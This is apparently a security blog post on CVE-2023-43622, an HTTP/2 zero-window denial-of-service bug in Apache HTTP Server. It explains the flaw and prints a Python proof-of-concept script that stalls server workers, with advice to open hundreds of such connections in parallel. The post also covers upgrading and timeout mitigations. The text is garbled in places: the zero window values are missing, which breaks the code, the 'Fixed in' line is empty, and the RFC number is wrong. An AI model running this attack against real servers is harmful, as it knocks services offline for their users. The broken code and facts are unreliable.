CVE-2023-43622 - How a Zero-Window HTTP/2 Attack Could Freeze Your Apache Server (And How to Fix It)

In September 2023, a new vulnerability was discovered in Apache HTTP Server affecting versions 2.4.55 to 2.4.57. Identified as CVE-2023-43622, this bug lets attackers freeze server connections with a technique similar to the classic "slow loris" attack—but now upgraded for the HTTP/2 era. In this article, we'll break down how the bug works, show you an example exploit, explain the fix, and help you secure your servers.

What’s the Vulnerability?

In simple terms:
If an attacker opens an HTTP/2 connection but sets the initial window size to , they can stop any data frames from being sent or received. Apache’s worker process will sit there waiting—potentially forever—using up a server thread until the connection finally times out.

With enough of these connections, an attacker can saturate all your server's available workers, making your website slow or unavailable. It's the modern equivalent of "slow loris," where many slow clients tie up all your server resources.

Applies to:

Apache HTTP Server versions 2.4.55, 2.4.56, and 2.4.57

- Only if HTTP/2 (mod_http2) is enabled

Fixed in:

How Does It Work?

In HTTP/2, the client and the server exchange control frames that manage how much data can be sent at once ("window size"). If a client sets their window size to zero, it basically says, "Don't send me anything, I'll let you know when I'm ready.” If the client never increases the window size, the connection is stuck.

Apache before 2.4.58 does not properly close these idle connections, leaving them open until Timeout is met—and with enough of them, all workers are blocked.

Exploit Example

Let’s see what this looks like in the wild. Here’s a basic Python example using the hyper-h2 library to open connections with a zero window size.

WARNING: This is for educational use only. Do NOT use it against servers you do not own.

import socket
from h2.connection import H2Connection
from h2.config import H2Configuration

SERVER = 'your-apache-server.com'
PORT = 443

sock = socket.create_connection((SERVER, PORT))
# If using TLS, wrap the socket here as needed

config = H2Configuration(client_side=True, header_encoding='utf-8')
conn = H2Connection(config=config)
conn.initiate_connection()

# Set initial SETTINGS frame with initial_window_size=
settings_frame = conn.local_settings
settings_frame.initial_window_size = 

sock.sendall(conn.data_to_send())

# Send headers (HTTP GET)
headers = [
    (':method', 'GET'),
    (':path', '/'),
    (':scheme', 'https'),
    (':authority', SERVER),
]
conn.send_headers(1, headers, end_stream=True)
sock.sendall(conn.data_to_send())

# Now just keep this connection open and do nothing.

input("Press Enter to close connection...")
sock.close()

Open dozens or hundreds of these connections in parallel, and your Apache HTTP/2 worker threads will start to saturate—making the service unresponsive.

Upgrade Apache!

The straightforward solution:

Upgrade to Apache HTTP Server 2.4.58 or later.

Download:
https://httpd.apache.org/download.cgi

What changed?

Starting with 2.4.58, Apache recognizes these "zero window" connections and will drop them as soon as they hit the configured connection timeout, instead of waiting forever.

If you cannot upgrade right away

- Reduce Timeout setting to a lower value in your Apache config, so idle connections are closed sooner (be sure this won't impact legit users).
- Limit number of HTTP/2 workers/processes to minimize damage.
- Consider using a reverse proxy (like nginx or HAProxy) in front of Apache to filter out slow connections.

References

- Apache security advisory for CVE-2023-43622
- CVE entry on Mitre
- HTTP/2 RFC 754, Section 6.9: Flow Control
- Original Apache httpd changelog

Conclusion

Even mature, widely used software like Apache can be tripped up by subtle protocol behavior, especially as attackers adapt classic techniques for new technologies.
If you run Apache with HTTP/2, update ASAP to 2.4.58 or higher to get protection against this attack!

If you want to stay secure, keep an eye on security lists, update your software regularly, and consider running network monitoring tools that alert you to suspicious connection patterns.

Stay safe and patch your servers!

*For exclusive deep dives and more practical security walk-throughs, follow this page or drop your comments/questions below!*

Timeline

Published on: 10/23/2023 07:15:11 UTC
Last modified on: 11/01/2023 18:11:02 UTC